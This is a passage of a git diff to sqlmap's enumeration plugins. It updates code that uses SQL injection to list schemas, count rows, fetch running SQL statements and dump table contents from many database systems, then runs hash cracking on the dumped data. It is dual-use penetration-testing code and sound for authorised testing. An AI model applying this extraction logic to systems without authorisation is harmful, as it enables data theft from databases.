retrieve column names for " - warnMsg += ("table '%s' " % tblList[0]) if len(tblList) == 1 else "any table " - warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) + warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList))) if len(tblList) == 1 else "any table " + if METADB_SUFFIX not in conf.db: + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + logger.warning(warnMsg) if bruteForce is None: return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) return kb.data.cachedColumns + @stackedmethod def getSchema(self): infoMsg = "enumerating database management system schema" logger.info(infoMsg) - pushValue(conf.db) - pushValue(conf.tbl) - pushValue(conf.col) + try: + pushValue(conf.db) + pushValue(conf.tbl) + pushValue(conf.col) - conf.db = None - conf.tbl = None - conf.col = None - kb.data.cachedTables = {} - kb.data.cachedColumns = {} + kb.data.cachedTables = {} + kb.data.cachedColumns = {} - self.getTables() - - infoMsg = "fetched tables: " - infoMsg += ", ".join(["%s" % ", ".join("%s%s%s" % (unsafeSQLIdentificatorNaming(db), ".." if \ - Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) \ - else ".", unsafeSQLIdentificatorNaming(t)) for t in tbl) for db, tbl in \ - kb.data.cachedTables.items()]) - logger.info(infoMsg) + self.getTables() - for db, tables in kb.data.cachedTables.items(): - for tbl in tables: - conf.db = db - conf.tbl = tbl + infoMsg = "fetched tables: " + infoMsg += ", ".join(["%s" % ", ".join("'%s%s%s'" % (unsafeSQLIdentificatorNaming(db), ".." if Backend.isDbms(DBMS.MSSQL) or Backend.isDbms(DBMS.SYBASE) else '.', unsafeSQLIdentificatorNaming(_)) if db else "'%s'" % unsafeSQLIdentificatorNaming(_) for _ in tbl) for db, tbl in kb.data.cachedTables.items()]) + logger.info(infoMsg) - self.getColumns() + for db, tables in kb.data.cachedTables.items(): + for tbl in tables: + conf.db = db + conf.tbl = tbl - conf.col = popValue() - conf.tbl = popValue() - conf.db = popValue() + self.getColumns() + finally: + conf.col = popValue() + conf.tbl = popValue() + conf.db = popValue() return kb.data.cachedColumns def _tableGetCount(self, db, table): - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if not db or not table: + return None + + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: db = db.upper() table = table.upper() - if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): query = "SELECT %s FROM %s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(table, True)) else: query = "SELECT %s FROM %s.%s" % (queries[Backend.getIdentifiedDbms()].count.query % '*', safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(table, True)) + query = agent.whereQuery(query) count = inject.getValue(query, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(count): @@ -762,24 +997,24 @@ def getCount(self): warnMsg = "missing table parameter, sqlmap will retrieve " warnMsg += "the number of entries for all database " warnMsg += "management system databases' tables" - logger.warn(warnMsg) + logger.warning(warnMsg) elif "." 
in conf.tbl: if not conf.db: - conf.db, conf.tbl = conf.tbl.split(".") + conf.db, conf.tbl = conf.tbl.split('.', 1) - if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + if conf.tbl is not None and conf.db is None and Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB): warnMsg = "missing database parameter. sqlmap is going to " warnMsg += "use the current database to retrieve the " warnMsg += "number of entries for table '%s'" % unsafeSQLIdentificatorNaming(conf.tbl) - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() self.forceDbmsEnum() if conf.tbl: - for table in conf.tbl.split(","): + for table in conf.tbl.split(','): self._tableGetCount(conf.db, table) else: self.getTables() @@ -789,3 +1024,81 @@ def getCount(self): self._tableGetCount(db, table) return kb.data.cachedCounts + + def getStatements(self): + infoMsg = "fetching SQL statements" + logger.info(infoMsg) + + rootQuery = queries[Backend.getIdentifiedDbms()].statements + + if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = rootQuery.inband.query2 + else: + query = rootQuery.inband.query + + while True: + values = inject.getValue(query, blind=False, time=False) + + if not isNoneValue(values): + kb.data.cachedStatements = [] + for value in arrayizeValue(values): + value = (unArrayizeValue(value) or "").strip() + if not isNoneValue(value): + kb.data.cachedStatements.append(value.strip()) + + elif Backend.isDbms(DBMS.PGSQL) and "current_query" not in query: + query = query.replace("query", "current_query") + continue + + break + + if not kb.data.cachedStatements and isInferenceAvailable() and not conf.direct: + infoMsg = "fetching number of statements" + logger.info(infoMsg) + + query = rootQuery.blind.count + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("INFORMATION_SCHEMA", "DATA_DICTIONARY", query, flags=re.I) + + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + + if count == 0: + return kb.data.cachedStatements + elif not isNumPosStrValue(count): + errMsg = "unable to retrieve the number of statements" + raise SqlmapNoneDataException(errMsg) + + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) + + for index in indexRange: + value = None + + if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): # case with multiple processes + query = rootQuery.blind.query3 % index + identifier = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT)) + + if not isNoneValue(identifier): + query = rootQuery.blind.query2 % identifier + value = unArrayizeValue(inject.getValue(query, union=False, error=False, expected=EXPECTED.INT)) + + if isNoneValue(value): + query = rootQuery.blind.query % index + + if Backend.isDbms(DBMS.MYSQL) and Backend.isFork(FORK.DRIZZLE): + query = re.sub("INFORMATION_SCHEMA", "DATA_DICTIONARY", query, flags=re.I) + + value = unArrayizeValue(inject.getValue(query, union=False, error=False)) + + if not isNoneValue(value): + kb.data.cachedStatements.append(value) + + if not kb.data.cachedStatements: + errMsg = "unable to retrieve the statements" + logger.error(errMsg) + else: + kb.data.cachedStatements = 
[_.replace(REFLECTED_VALUE_MARKER, "<payload>") for _ in kb.data.cachedStatements] + + return kb.data.cachedStatements diff --git a/plugins/generic/entries.py b/plugins/generic/entries.py index 1db68a1d790..cf1e3cd94e9 100644 --- a/plugins/generic/entries.py +++ b/plugins/generic/entries.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re @@ -12,7 +12,7 @@ from lib.core.common import Backend from lib.core.common import clearConsoleLine from lib.core.common import getLimitRange -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import isInferenceAvailable from lib.core.common import isListLike from lib.core.common import isNoneValue @@ -21,8 +21,12 @@ from lib.core.common import prioritySortColumns from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming +from lib.core.convert import getConsoleLength +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -38,12 +42,17 @@ from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import CHECK_ZERO_COLUMNS_THRESHOLD from lib.core.settings import CURRENT_DB +from lib.core.settings import METADB_SUFFIX from lib.core.settings import NULL +from lib.core.settings import PLUS_ONE_DBMSES +from lib.core.settings import UPPER_CASE_DBMSES from lib.request import inject from lib.utils.hash import attackDumpedTable from lib.utils.pivotdumptable import pivotDumpTable +from thirdparty import six +from thirdparty.six.moves import zip as _zip -class Entries: +class Entries(object): """ This class defines entries' enumeration functionalities for plugins. """ @@ -59,83 +68,116 @@ def dumpTable(self, foundData=None): warnMsg = "missing database parameter. 
sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) entries" - logger.warn(warnMsg) + logger.warning(warnMsg) conf.db = self.getCurrentDb() elif conf.db is not None: - if Backend.isDbms(DBMS.ORACLE): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() - if ',' in conf.db: + if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) - conf.db = safeSQLIdentificatorNaming(conf.db) + if conf.exclude and re.search(conf.exclude, conf.db, re.I) is not None: + infoMsg = "skipping database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + singleTimeLogMessage(infoMsg) + return + + conf.db = safeSQLIdentificatorNaming(conf.db) or "" if conf.tbl: - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.tbl = conf.tbl.upper() - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() + tblList = list(six.itervalues(kb.data.cachedTables)) - if isinstance(tblList[0], (set, tuple, list)): + if tblList and isListLike(tblList[0]): tblList = tblList[0] - else: + elif conf.db and not conf.search: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) raise SqlmapNoneDataException(errMsg) + else: + return for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True) for tbl in tblList: + if kb.dumpKeyboardInterrupt: + break + + if conf.exclude and re.search(conf.exclude, unsafeSQLIdentificatorNaming(tbl), re.I) is not None: + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + singleTimeLogMessage(infoMsg) + continue + conf.tbl = tbl kb.data.dumpedTable = {} if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) - - if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ - or safeSQLIdentificatorNaming(tbl, True) not in \ - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] \ - or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: - warnMsg = "unable to enumerate the columns for table " - warnMsg += "'%s' in database" % unsafeSQLIdentificatorNaming(tbl) - warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(conf.db) + if Backend.isDbms(DBMS.INFORMIX): + kb.dumpTable = "%s:%s" % (conf.db, tbl) + elif Backend.isDbms(DBMS.SQLITE): + kb.dumpTable = tbl + elif METADB_SUFFIX.upper() in conf.db.upper(): + kb.dumpTable = tbl + else: + kb.dumpTable = "%s.%s" % (conf.db, tbl) + + if safeSQLIdentificatorNaming(conf.db) not in kb.data.cachedColumns or safeSQLIdentificatorNaming(tbl, True) not in kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] or not kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)]: + warnMsg = "unable to enumerate the columns for table '%s'" % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX.upper() not in conf.db.upper(): + warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) warnMsg += ", skipping" if len(tblList) > 1 else "" - logger.warn(warnMsg) + logger.warning(warnMsg) continue columns = 
kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] - colList = sorted(filter(None, columns.keys())) - colNames = colString = ", ".join(column for column in colList) + colList = sorted(column for column in columns if column) + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + if not colList: + warnMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(tbl) + if METADB_SUFFIX.upper() not in conf.db.upper(): + warnMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + warnMsg += " (no usable column names)" + logger.warning(warnMsg) + continue + + kb.dumpColumns = [unsafeSQLIdentificatorNaming(_) for _ in colList] + colNames = colString = ','.join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table infoMsg = "fetching entries" if conf.col: infoMsg += " of column(s) '%s'" % colNames infoMsg += " for table '%s'" % unsafeSQLIdentificatorNaming(tbl) - infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) + if METADB_SUFFIX.upper() not in conf.db.upper(): + infoMsg += " in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) for column in colList: _ = agent.preprocessField(tbl, column) if _ != column: - colString = re.sub(r"\b%s\b" % column, _, colString) + colString = re.sub(r"\b%s\b" % re.escape(column), _.replace("\\", r"\\"), colString) entriesCount = 0 @@ -143,32 +185,81 @@ def dumpTable(self, foundData=None): entries = [] query = None - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (colString, tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB): + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA, DBMS.SNOWFLAKE): query = rootQuery.inband.query % (colString, tbl) elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): # Partial inband and error if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): - table = "%s.%s" % (conf.db, tbl) - - retVal = pivotDumpTable(table, colList, blind=False) - - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) + table = "%s.%s" % (conf.db, tbl) if conf.db else tbl + + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. 
column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + + query = rootQuery.blind.count % table + query = agent.whereQuery(query) + + count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if isNumPosStrValue(count): + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + row = [] + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=False, time=False, dump=True) or "" + row.append(value) + + if not entries and isNoneValue(row): + break + + entries.append(row) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if isNoneValue(entries) and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, blind=False) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if retVal: + entries, _ = retVal + entries = BigArray(_zip(*[entries[colName] for colName in colList])) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.VIRTUOSO, DBMS.CLICKHOUSE): query = rootQuery.inband.query % (colString, conf.db, tbl, prioritySortColumns(colList)[0]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) + query = agent.whereQuery(query) + + if not entries and query and not kb.dumpKeyboardInterrupt: + try: + entries = inject.getValue(query, blind=False, time=False, dump=True) + except KeyboardInterrupt: + entries = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) if not isNoneValue(entries): - if isinstance(entries, basestring): + if isinstance(entries, six.string_types): entries = [entries] elif not isListLike(entries): entries = [] @@ -183,13 +274,12 @@ def dumpTable(self, foundData=None): if entry is None or len(entry) == 0: continue - if isinstance(entry, basestring): + if isinstance(entry, six.string_types): colEntry = entry else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) + maxLen = max(getConsoleLength(column), getConsoleLength(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen @@ -204,17 +294,19 @@ def dumpTable(self, foundData=None): infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) logger.info(infoMsg) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE, DBMS.MIMERSQL, DBMS.SNOWFLAKE): query = rootQuery.blind.count % (tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper()))) - elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.ACCESS, DBMS.FIREBIRD): + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, 
DBMS.MAXDB, DBMS.ACCESS, DBMS.FIREBIRD, DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): query = rootQuery.blind.count % tbl elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) - elif Backend.isDbms(DBMS.MAXDB): - query = rootQuery.blind.count % tbl + query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) if conf.db else tbl + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) + query = agent.whereQuery(query) + count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) lengths = {} @@ -224,7 +316,7 @@ def dumpTable(self, foundData=None): warnMsg = "table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s' " % unsafeSQLIdentificatorNaming(conf.db) warnMsg += "appears to be empty" - logger.warn(warnMsg) + logger.warning(warnMsg) for column in colList: lengths[column] = len(column) @@ -236,31 +328,72 @@ def dumpTable(self, foundData=None): warnMsg += "column(s) '%s' " % colNames warnMsg += "entries for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue - elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL): - if Backend.isDbms(DBMS.ACCESS): + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.SYBASE, DBMS.MAXDB, DBMS.MSSQL, DBMS.INFORMIX, DBMS.MCKOI, DBMS.RAIMA): + if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.RAIMA): table = tbl - elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL): - table = "%s.%s" % (conf.db, tbl) - elif Backend.isDbms(DBMS.MAXDB): - table = "%s.%s" % (conf.db, tbl) + elif Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MSSQL, DBMS.MAXDB): + table = "%s.%s" % (conf.db, tbl) if conf.db else tbl + elif Backend.isDbms(DBMS.INFORMIX): + table = "%s:%s" % (conf.db, tbl) if conf.db else tbl + + if Backend.isDbms(DBMS.MSSQL) and not conf.forcePivoting: + warnMsg = "in case of table dumping problems (e.g. 
column entry order) " + warnMsg += "you are advised to rerun with '--force-pivoting'" + singleTimeWarnMessage(warnMsg) + + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + + value = inject.getValue(query, union=False, error=False, dump=True) or "" + + if column not in lengths: + lengths[column] = 0 + + if column not in entries: + entries[column] = BigArray() + + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) + entries[column].append(value) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, count, blind=True) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warning(warnMsg) - retVal = pivotDumpTable(table, colList, count, blind=True) - - if retVal: - entries, lengths = retVal + if retVal: + entries, lengths = retVal else: emptyColumns = [] - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: + debugMsg = "checking for empty columns" + logger.debug(debugMsg) + for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': + if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -277,29 +410,36 @@ def dumpTable(self, foundData=None): if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB, DBMS.H2, DBMS.VERTICA, DBMS.PRESTO, DBMS.CRATEDB, DBMS.CACHE, DBMS.CLICKHOUSE, DBMS.SNOWFLAKE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) - elif Backend.isDbms(DBMS.SQLITE): + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.DERBY, DBMS.ALTIBASE,): + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) + elif Backend.getIdentifiedDbms() in (DBMS.MIMERSQL,): + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), sorted(colList, key=len)[0], index) + elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.EXTREMEDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) + elif 
Backend.getIdentifiedDbms() in (DBMS.INFORMIX, DBMS.VIRTUOSO): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) + elif Backend.isDbms(DBMS.FRONTBASE): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl) + else: + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, tbl, index) + + query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" - logger.warn(warnMsg) + logger.warning(warnMsg) for column, columnEntries in entries.items(): length = max(lengths[column], len(column)) @@ -314,20 +454,29 @@ def dumpTable(self, foundData=None): warnMsg += "of columns '%s' " % colNames warnMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'%s" % (unsafeSQLIdentificatorNaming(conf.db), " (permission denied)" if kb.permissionFlag else "") - logger.warn(warnMsg) + logger.warning(warnMsg) else: kb.data.dumpedTable["__infos__"] = {"count": entriesCount, "table": safeSQLIdentificatorNaming(tbl, True), "db": safeSQLIdentificatorNaming(conf.db)} - attackDumpedTable() + + if not conf.disableHashing: + try: + attackDumpedTable() + except (IOError, OSError) as ex: + errMsg = "an error occurred while attacking " + errMsg += "table dump ('%s')" % getSafeExString(ex) + logger.critical(errMsg) + conf.dumper.dbTableValues(kb.data.dumpedTable) - except SqlmapConnectionException, e: - errMsg = "connection exception detected in dumping phase: " - errMsg += "'%s'" % e + except SqlmapConnectionException as ex: + errMsg = "connection exception detected in dumping phase " + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: + kb.dumpColumns = None kb.dumpTable = None def dumpAll(self): @@ -350,12 +499,17 @@ def dumpAll(self): if kb.data.cachedTables: if isinstance(kb.data.cachedTables, list): - kb.data.cachedTables = { None: kb.data.cachedTables } + kb.data.cachedTables = {None: kb.data.cachedTables} for db, tables in kb.data.cachedTables.items(): conf.db = db for table in tables: + if conf.exclude and re.search(conf.exclude, table, re.I) is not None: + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) + logger.info(infoMsg) + continue + try: conf.tbl = table kb.data.cachedColumns = {} @@ -363,14 +517,13 @@ def dumpAll(self): self.dumpTable() except SqlmapNoneDataException: - infoMsg = "skipping table '%s'" % table + infoMsg = "skipping table '%s'" % unsafeSQLIdentificatorNaming(table) logger.info(infoMsg) def dumpFoundColumn(self, dbs, foundCols, colConsider): - message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") + message = "do you want to dump found column(s) entries? 
[Y/n] " - if output and output[0] not in ("y", "Y"): + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -378,17 +531,17 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): for db, tblData in dbs.items(): if tblData: - message += "[%s]\n" % db + message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): - dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): + if not choice or choice in ('a', 'A'): + dumpFromDbs = list(dbs.keys()) + elif choice in ('q', 'Q'): return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tblData in dbs.items(): if db not in dumpFromDbs or not tblData: @@ -396,7 +549,7 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.db = db dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % db + message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message += "[a]ll (default)\n" for tbl in tblData: @@ -404,23 +557,28 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromTbls = tblData - elif test in ("s", "S"): + elif choice in ('s', 'S'): continue - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table, columns in tblData.items(): if table not in dumpFromTbls: continue conf.tbl = table - conf.col = ",".join(column for column in filter(None, sorted(columns))) + colList = [_ for _ in columns if _] + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + + conf.col = ','.join(colList) kb.data.cachedColumns = {} kb.data.dumpedTable = {} @@ -430,10 +588,9 @@ def dumpFoundColumn(self, dbs, foundCols, colConsider): conf.dumper.dbTableValues(data) def dumpFoundTables(self, tables): - message = "do you want to dump tables' entries? [Y/n] " - output = readInput(message, default="Y") + message = "do you want to dump found table(s) entries? 
